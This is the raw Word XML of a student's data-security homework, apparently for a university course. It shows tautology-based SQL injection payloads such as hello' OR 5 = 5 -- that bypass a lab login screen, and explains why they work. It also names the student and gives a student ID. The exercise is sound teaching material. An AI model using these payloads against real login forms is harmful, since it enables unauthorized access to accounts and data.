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04DE1C" w14:textId="44F4D015" w:rsidR="00730380" w:rsidRDefault="00730380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>COMP430 Data Privacy &amp; Security Homework4 Question2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D22674" w14:textId="77777777" w:rsidR="004661A5" w:rsidRDefault="00730380">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Name – Surname: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Barış</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Kaplan</w:t>
      </w:r>
      <w:r w:rsidR="00D03D5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A383D47" w14:textId="4D69965E" w:rsidR="00730380" w:rsidRDefault="00D03D5C">
      <w:r w:rsidRPr="00D03D5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>My KU ID</w:t>
      </w:r>
      <w:r w:rsidR="004661A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Number</w:t>
      </w:r>
      <w:r w:rsidRPr="00D03D5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0069054</w:t>
      </w:r>
      <w:r w:rsidR="00C91386">
        <w:t xml:space="preserve"> (69054)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD5A68" w14:textId="4778DF9D" w:rsidR="00730380" w:rsidRDefault="00730380">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">KU Login Name: </w:t>
      </w:r>
      <w:r w:rsidRPr="00730380">
        <w:t>bkaplan18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03275411" w14:textId="16D0D556" w:rsidR="00730380" w:rsidRDefault="00730380"/>
    <w:p w14:paraId="7943FEAA" w14:textId="56206C33" w:rsidR="00684312" w:rsidRPr="00730380" w:rsidRDefault="00730380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730380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–</w:t>
      </w:r>
      <w:r w:rsidRPr="00730380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649510D2" w14:textId="34E3B6D9" w:rsidR="00730380" w:rsidRPr="00231739" w:rsidRDefault="000450F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231739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33BAAF6C" wp14:editId="3F570ECF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-815904</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>248903</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7278370" cy="4366260"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapNone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466" cy="4388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0380" w:rsidRPr="00231739">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>First Challenge (First Part):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C526E" w14:textId="1257BE22" w:rsidR="00730380" w:rsidRDefault="00730380"/>
    <w:p w14:paraId="7910BF8D" w14:textId="6C002F23" w:rsidR="00D03D5C" w:rsidRDefault="00D03D5C"/>
    <w:p w14:paraId="754427E3" w14:textId="11749EE1" w:rsidR="00D03D5C" w:rsidRDefault="0068431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C0FD4C" wp14:editId="2629FCD5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-815905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4422128</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7278935" cy="3640822"/>
                <wp:effectExtent l="0" t="0" r="11430" b="17145"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="Metin Kutusu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8935" cy="36408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5B7D29" w14:textId="45ABFC17" w:rsidR="005F3A04" w:rsidRPr="004661A5" w:rsidRDefault="00730380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Payload</w:t>
                            </w:r>
                            <w:r w:rsidR="000450F6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s</w:t>
                            </w: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that I have entered: </w:t>
                            </w:r>
                            <w:r w:rsidR="000450F6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</w:p>
                          <w:p w14:paraId="2D941396" w14:textId="77777777" w:rsidR="005F3A04" w:rsidRPr="004661A5" w:rsidRDefault="005F3A04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</w:p>
                          <w:p w14:paraId="0ED1FB7E" w14:textId="3EB39697" w:rsidR="00730380" w:rsidRPr="004661A5" w:rsidRDefault="0073038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For Username: </w:t>
                            </w:r>
                            <w:r w:rsidR="00AA240C"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DF55BC" w:rsidRPr="00DF55BC">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>hello</w:t>
                            </w:r>
                            <w:r w:rsidRPr="004661A5">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve">' </w:t>
                            </w:r>
                            <w:r w:rsidR="00DA42E6" w:rsidRPr="004661A5">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>OR</w:t>
                            </w:r>
                            <w:r w:rsidRPr="004661A5">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 5 = 5</w:t>
                            </w:r>
                            <w:r w:rsidR="00DA42E6" w:rsidRPr="004661A5">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> --</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6377BCC3" w14:textId="22D81653" w:rsidR="00730380" w:rsidRPr="004661A5" w:rsidRDefault="00730380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For Password: </w:t>
                            </w:r>
                            <w:r w:rsidR="00AA240C"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proofErr w:type="spellStart"/>
                            <w:r w:rsidR="005F3A04" w:rsidRPr="004661A5">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>fbfbfb</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="000450F6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DAF1B49" w14:textId="24C0272D" w:rsidR="005F3A04" w:rsidRPr="004661A5" w:rsidRDefault="005F3A0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4C3FAAC8" w14:textId="4428A11B" w:rsidR="006F27AC" w:rsidRPr="004661A5" w:rsidRDefault="005F3A04" w:rsidP="00121979">
                            <w:pPr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Explanation about the username and password payloads I have entered/written</w:t>
                            </w:r>
                            <w:r w:rsidR="00231739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(For the first challenge of question2)</w:t>
                            </w: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: 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For the username payload of the first challenge of Question2, I have written </w:t>
                            </w:r>
                            <w:r w:rsidR="00DF55BC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hello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' OR 5 = 5 --. The </w:t>
                            </w:r>
                            <w:r w:rsidR="000450F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“hello” string concatenated with a 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single quotation mark </w:t>
                            </w:r>
                            <w:r w:rsidR="000450F6" w:rsidRPr="000450F6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(</w:t>
                            </w:r>
                            <w:r w:rsidR="000450F6" w:rsidRPr="000450F6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hello')</w:t>
                            </w:r>
                            <w:r w:rsidR="000450F6" w:rsidRPr="004661A5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at the beginning of </w:t>
                            </w:r>
                            <w:r w:rsidR="00987647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my username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payload is for closing the starting single quotation mark which is right after the “username=” part in the Query. After that, I have used “OR” logical operator of SQL. Then, I have written the statement “5=5”, which will always be evaluated as true. </w:t>
                            </w:r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To make the query disregard/ignore everything written after “--” (two </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/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seperate</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/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dashes), </w:t>
                            </w:r>
                            <w:r w:rsidR="00DA42E6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I have added “</w:t>
                            </w:r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--” (two </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/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seperate</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00121979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dashes) at the end of my username payload. Because, in the SQL syntax, -- is used for adding comments to the SQL queries. </w:t>
                            </w:r>
                            <w:r w:rsidR="00987647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Moreover, comments are not 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considered</w:t>
                            </w:r>
                            <w:r w:rsidR="00D03D5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/evaluated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="00987647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executed while SQL queries</w:t>
                            </w:r>
                            <w:r w:rsidR="00D03D5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are executed</w:t>
                            </w:r>
                            <w:r w:rsidR="00987647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. As</w:t>
                            </w:r>
                            <w:r w:rsidR="004A42E0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I mentioned, everything after “--” in my username payload will be ignored by the query. So, it means that any arbitrary password of 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my</w:t>
                            </w:r>
                            <w:r w:rsidR="004A42E0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choice can be entered as the password payload to enter to the system. In this challenge, I have entered </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidR="004A42E0" w:rsidRPr="00CC5666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fbfbfb</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="004A42E0" w:rsidRPr="00CC5666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A42E0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as the password payload. After I enter the username payload,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consequently, </w:t>
                            </w:r>
                            <w:r w:rsidR="004A42E0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the whole query will be evaluated as “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4A42E0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SELECT * FROM users WHERE username =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'</w:t>
                            </w:r>
                            <w:r w:rsidR="000450F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hello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' OR 5 = 5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”. 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So,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regardless of what the username </w:t>
                            </w:r>
                            <w:r w:rsidR="00CC5666" w:rsidRPr="00CC5666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(or the evaluation of username)</w:t>
                            </w:r>
                            <w:r w:rsidR="00CC566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is, since 5 = 5 is always true, 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“ username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=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'</w:t>
                            </w:r>
                            <w:r w:rsidR="0097619A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hello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' OR 5 = 5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” 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will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also always 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be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true</w:t>
                            </w:r>
                            <w:r w:rsidR="00D03D5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D03D5C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(</w:t>
                            </w:r>
                            <w:r w:rsidR="004661A5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false OR true = true. true OR true = true. So, this </w:t>
                            </w:r>
                            <w:r w:rsidR="00D03D5C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bring</w:t>
                            </w:r>
                            <w:r w:rsidR="00684312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s</w:t>
                            </w:r>
                            <w:r w:rsidR="00D03D5C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tautology)</w:t>
                            </w:r>
                            <w:r w:rsidR="004661A5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.</w:t>
                            </w:r>
                            <w:r w:rsidR="00D03D5C" w:rsidRPr="004661A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  <w:r w:rsidR="006F27A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Therefore, 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the whole query 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will also always be</w:t>
                            </w:r>
                            <w:r w:rsidR="009B630A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evaluated as a valid and true query. </w:t>
                            </w:r>
                            <w:r w:rsidR="00D03D5C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Consequently, t</w:t>
                            </w:r>
                            <w:r w:rsidR="007A66BD" w:rsidRPr="004661A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>his situation shows that my username payload and password payload worked, and thus I could bypass the login screen,  list all users, and proceed to the next challenge.</w:t>
                            </w:r>
                            <w:r w:rsidR="00684312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52DC1A75" w14:textId="77777777" w:rsidR="004A42E0" w:rsidRPr="004A42E0" w:rsidRDefault="004A42E0" w:rsidP="00121979">
                            <w:pPr>
                              <w:jc w:val="both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7AABC056" w14:textId="442FA883" w:rsidR="005F3A04" w:rsidRPr="00DA42E6" w:rsidRDefault="005F3A04"/>
                          <w:p w14:paraId="41C21726" w14:textId="77777777" w:rsidR="005F3A04" w:rsidRPr="005F3A04" w:rsidRDefault="005F3A04"/>
                          <w:p w14:paraId="76E1DECC" w14:textId="77777777" w:rsidR="00730380" w:rsidRPr="00730380" w:rsidRDefault="007303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0FD4C" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Metin Kutusu 3" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:-64.25pt;margin-top:348.2pt;width:573.15pt;height:286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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="495B7D29" w14:textId="45ABFC17" w:rsidR="005F3A04" w:rsidRPr="004661A5" w:rsidRDefault="00730380">
                      <w:pPr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>Payload</w:t>
                      </w:r>
                      <w:r w:rsidR="000450F6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>s</w:t>
                      </w:r>
                      <w:r w:rsidRPr="004661A5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 xml:space="preserve"> that I have entered: </w:t>
                      </w:r>
                      <w:r w:rsidR="000450F6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</w:p>
                    <w:p w14:paraId="2D941396" w14:textId="77777777" w:rsidR="005F3A04" w:rsidRPr="004661A5" w:rsidRDefault="005F3A04">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="0ED1FB7E" w14:textId="3EB39697" w:rsidR="00730380" w:rsidRPr="004661A5" w:rsidRDefault="00730380">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22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For Username: </w:t>
                      </w:r>
                      <w:r w:rsidR="00AA240C"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        </w:t>
                      </w:r>
                      <w:r w:rsidR="00DF55BC" w:rsidRPr="00DF55BC">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>hello</w:t>
                      </w:r>
                      <w:r w:rsidRPr="004661A5">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve">' </w:t>
                      </w:r>
                      <w:r w:rsidR="00DA42E6" w:rsidRPr="004661A5">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>OR</w:t>
                      </w:r>
                      <w:r w:rsidRPr="004661A5">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 5 = 5</w:t>
                      </w:r>
                      <w:r w:rsidR="00DA42E6" w:rsidRPr="004661A5">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> --</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6377BCC3" w14:textId="22D81653" w:rsidR="00730380" w:rsidRPr="004661A5" w:rsidRDefault="00730380">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22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For Password: </w:t>
                      </w:r>
                      <w:r w:rsidR="00AA240C"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         </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="005F3A04" w:rsidRPr="004661A5">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>fbfbfb</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="000450F6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2DAF1B49" w14:textId="24C0272D" w:rsidR="005F3A04" w:rsidRPr="004661A5" w:rsidRDefault="005F3A04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4C3FAAC8" w14:textId="4428A11B" w:rsidR="006F27AC" w:rsidRPr="004661A5" w:rsidRDefault="005F3A04" w:rsidP="00121979">
                      <w:pPr>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22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>Explanation about the username and password payloads I have entered/written</w:t>
                      </w:r>
                      <w:r w:rsidR="00231739">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> (For the first challenge of question2)</w:t>
                      </w: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: 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For the username payload of the first challenge of Question2, I have written </w:t>
                      </w:r>
                      <w:r w:rsidR="00DF55BC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hello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' OR 5 = 5 --. The </w:t>
                      </w:r>
                      <w:r w:rsidR="000450F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“hello” string concatenated with a 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single quotation mark </w:t>
                      </w:r>
                      <w:r w:rsidR="000450F6" w:rsidRPr="000450F6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(</w:t>
                      </w:r>
                      <w:r w:rsidR="000450F6" w:rsidRPr="000450F6">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                        <w:t>hello')</w:t>
                      </w:r>
                      <w:r w:rsidR="000450F6" w:rsidRPr="004661A5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at the beginning of </w:t>
                      </w:r>
                      <w:r w:rsidR="00987647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my username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payload is for closing the starting single quotation mark which is right after the “username=” part in the Query. After that, I have used “OR” logical operator of SQL. Then, I have written the statement “5=5”, which will always be evaluated as true. </w:t>
                      </w:r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To make the query disregard/ignore everything written after “--” (two </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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seperate</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/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dashes), </w:t>
                      </w:r>
                      <w:r w:rsidR="00DA42E6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I have added “</w:t>
                      </w:r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--” (two </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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seperate</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="00121979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dashes) at the end of my username payload. Because, in the SQL syntax, -- is used for adding comments to the SQL queries. </w:t>
                      </w:r>
                      <w:r w:rsidR="00987647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Moreover, comments are not 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considered</w:t>
                      </w:r>
                      <w:r w:rsidR="00D03D5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/evaluated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and </w:t>
                      </w:r>
                      <w:r w:rsidR="00987647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executed while SQL queries</w:t>
                      </w:r>
                      <w:r w:rsidR="00D03D5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are executed</w:t>
                      </w:r>
                      <w:r w:rsidR="00987647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. As</w:t>
                      </w:r>
                      <w:r w:rsidR="004A42E0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I mentioned, everything after “--” in my username payload will be ignored by the query. So, it means that any arbitrary password of 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my</w:t>
                      </w:r>
                      <w:r w:rsidR="004A42E0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choice can be entered as the password payload to enter to the system. In this challenge, I have entered </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="004A42E0" w:rsidRPr="00CC5666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fbfbfb</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidR="004A42E0" w:rsidRPr="00CC5666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4A42E0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as the password payload. After I enter the username payload,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consequently, </w:t>
                      </w:r>
                      <w:r w:rsidR="004A42E0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the whole query will be evaluated as “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4A42E0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SELECT * FROM users WHERE username =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'</w:t>
                      </w:r>
                      <w:r w:rsidR="000450F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hello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' OR 5 = 5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”. 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So,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regardless of what the username </w:t>
                      </w:r>
                      <w:r w:rsidR="00CC5666" w:rsidRPr="00CC5666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(or the evaluation of username)</w:t>
                      </w:r>
                      <w:r w:rsidR="00CC566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is, since 5 = 5 is always true, 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“ username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=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'</w:t>
                      </w:r>
                      <w:r w:rsidR="0097619A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hello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' OR 5 = 5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” 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will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also always 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be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true</w:t>
                      </w:r>
                      <w:r w:rsidR="00D03D5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D03D5C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(</w:t>
                      </w:r>
                      <w:r w:rsidR="004661A5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false OR true = true. true OR true = true. So, this </w:t>
                      </w:r>
                      <w:r w:rsidR="00D03D5C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bring</w:t>
                      </w:r>
                      <w:r w:rsidR="00684312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s</w:t>
                      </w:r>
                      <w:r w:rsidR="00D03D5C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tautology)</w:t>
                      </w:r>
                      <w:r w:rsidR="004661A5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.</w:t>
                      </w:r>
                      <w:r w:rsidR="00D03D5C" w:rsidRPr="004661A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  <w:r w:rsidR="006F27A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Therefore, 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the whole query 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will also always be</w:t>
                      </w:r>
                      <w:r w:rsidR="009B630A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evaluated as a valid and true query. </w:t>
                      </w:r>
                      <w:r w:rsidR="00D03D5C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Consequently, t</w:t>
                      </w:r>
                      <w:r w:rsidR="007A66BD" w:rsidRPr="004661A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>his situation shows that my username payload and password payload worked, and thus I could bypass the login screen,  list all users, and proceed to the next challenge.</w:t>
                      </w:r>
                      <w:r w:rsidR="00684312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  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="52DC1A75" w14:textId="77777777" w:rsidR="004A42E0" w:rsidRPr="004A42E0" w:rsidRDefault="004A42E0" w:rsidP="00121979">
                      <w:pPr>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="7AABC056" w14:textId="442FA883" w:rsidR="005F3A04" w:rsidRPr="00DA42E6" w:rsidRDefault="005F3A04"/>
                    <w:p w14:paraId="41C21726" w14:textId="77777777" w:rsidR="005F3A04" w:rsidRPr="005F3A04" w:rsidRDefault="005F3A04"/>
                    <w:p w14:paraId="76E1DECC" w14:textId="77777777" w:rsidR="00730380" w:rsidRPr="00730380" w:rsidRDefault="0073038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058C2D" wp14:editId="00DB3F66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-815906</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4136903</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7320315" cy="226503"/>
                <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Metin Kutusu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0315" cy="226503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96613C" w14:textId="24EBD7FD" w:rsidR="00730380" w:rsidRPr="00100D02" w:rsidRDefault="00730380" w:rsidP="00730380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0D02">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>Screenshot which shows the successful login message after I enter correct payload</w:t>
                            </w:r>
                            <w:r w:rsidR="00C12394" w:rsidRPr="00100D02">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>s</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00100D02">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve"> in the first challenge of question2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8C2D" id="Metin Kutusu 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:-64.25pt;margin-top:325.75pt;width:576.4pt;height:17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" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4B96613C" w14:textId="24EBD7FD" w:rsidR="00730380" w:rsidRPr="00100D02" w:rsidRDefault="00730380" w:rsidP="00730380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 w:rsidRPr="00100D02">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>Screenshot which shows the successful login message after I enter correct payload</w:t>
                      </w:r>
                      <w:r w:rsidR="00C12394" w:rsidRPr="00100D02">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>s</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00100D02">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve"> in the first challenge of question2</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D03D5C">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C689E" w14:textId="775B1AF2" w:rsidR="00730380" w:rsidRPr="00231739" w:rsidRDefault="00AE5E3F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983AD4B" wp14:editId="431A4FA4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-824294</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>232719</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7415868" cy="4307205"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapNone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283" cy="4311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619A" w:rsidRPr="00231739">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Second Challenge (Second Part)</w:t>
      </w:r>
      <w:r w:rsidR="00A42D67" w:rsidRPr="00231739">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA1D05D" w14:textId="2A1EB6E4" w:rsidR="00A42D67" w:rsidRDefault="00A42D67">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FBB92A" w14:textId="07A1F080" w:rsidR="00A42D67" w:rsidRPr="00A42D67" w:rsidRDefault="00A42D67">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A04FCA2" w14:textId="1E2F2B54" w:rsidR="0097619A" w:rsidRDefault="0097619A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E46D392" w14:textId="77777777" w:rsidR="00E845E8" w:rsidRDefault="00E845E8"/>
    <w:p w14:paraId="164CFA25" w14:textId="13FE9780" w:rsidR="00E845E8" w:rsidRDefault="00100D02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5E941B" wp14:editId="638D545C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-908050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3899535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7558481" cy="4975200"/>
                <wp:effectExtent l="0" t="0" r="10795" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="11" name="Metin Kutus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8481" cy="4975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480310" w14:textId="25F9D509" w:rsidR="00231739" w:rsidRPr="006921C6" w:rsidRDefault="00231739" w:rsidP="00231739">
                            <w:pPr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Payload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>s</w:t>
                            </w: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that I have entered: </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/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</w:p>
                          <w:p w14:paraId="71AA87BA" w14:textId="19E282A4" w:rsidR="00231739" w:rsidRPr="004661A5" w:rsidRDefault="00231739" w:rsidP="0023173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For Username:         </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00DF55BC">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>hello</w:t>
                            </w:r>
                            <w:r w:rsidRPr="004661A5">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve">' OR </w:t>
                            </w:r>
                            <w:r w:rsidR="00AE5E3F"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  <w:r w:rsidRPr="004661A5">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> = </w:t>
                            </w:r>
                            <w:r w:rsidR="00AE5E3F">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>9</w:t>
                            </w:r>
                            <w:r w:rsidRPr="004661A5">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> --</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3625E1C8" w14:textId="77777777" w:rsidR="00231739" w:rsidRPr="004661A5" w:rsidRDefault="00231739" w:rsidP="0023173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661A5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For Password:          </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="004661A5">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                              <w:t>fbfbfb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66538F32" w14:textId="77777777" w:rsidR="00231739" w:rsidRPr="004661A5" w:rsidRDefault="00231739" w:rsidP="0023173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12611E7C" w14:textId="7423F264" w:rsidR="00231739" w:rsidRPr="00C11C85" w:rsidRDefault="00231739" w:rsidP="00C11C85">
                            <w:pPr>
                              <w:spacing w:line="276" w:lineRule="auto"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:rFonts w:cstheme="minorHAnsi"/>
                                <w:sz w:val="21"/>
                                <w:szCs w:val="21"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r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Explanation about the username and password payloads I have entered/written:</w:t>
                            </w:r>
                            <w:r w:rsidR="00340D85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886DA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For bypassing the login screen and proceeding to the next challenge, I have used username payload and password payload which are almost same with the ones I used in the previous question (Challenge1 of the Question2). </w:t>
                            </w:r>
                            <w:r w:rsidR="002006E5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In this challenge, </w:t>
                            </w:r>
                            <w:r w:rsidR="00886DA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I have</w:t>
                            </w:r>
                            <w:r w:rsidR="002006E5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only</w:t>
                            </w:r>
                            <w:r w:rsidR="00886DA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changed the condition “ 5 = 5 ” to the condition “ 9 = 9 ”. 9 = 9 will also always be evaluated as true. </w:t>
                            </w:r>
                            <w:r w:rsidR="007F0463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Therefore, this change does not change the evaluation of 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the outcome </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/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condition in the </w:t>
                            </w:r>
                            <w:r w:rsidR="00004B19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WHERE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part of the query.</w:t>
                            </w:r>
                            <w:r w:rsidR="00471F0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D178D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In the syntax of SQL, the escape character is used to treat the </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
